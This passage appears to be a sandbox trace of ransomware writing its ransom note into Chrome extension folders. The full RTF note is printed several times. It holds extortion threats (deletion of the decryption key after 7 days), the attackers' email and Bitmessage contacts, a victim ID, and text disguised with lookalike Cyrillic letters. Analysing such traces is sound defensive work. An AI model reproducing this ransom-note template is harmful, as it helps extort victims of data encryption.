br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nSë\x91W[d¼\"òÈF\x17þê\x89|ó¢kö\x97pcÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0285.077] WriteFile (in: hFile=0x294, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0285.077] CloseHandle (hObject=0x294) returned 1 [0285.078] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\#readme_eman#.rtf")) returned 0xffffffff [0285.078] GetLastError () returned 0x2 [0285.078] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0285.079] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.079] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.079] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r 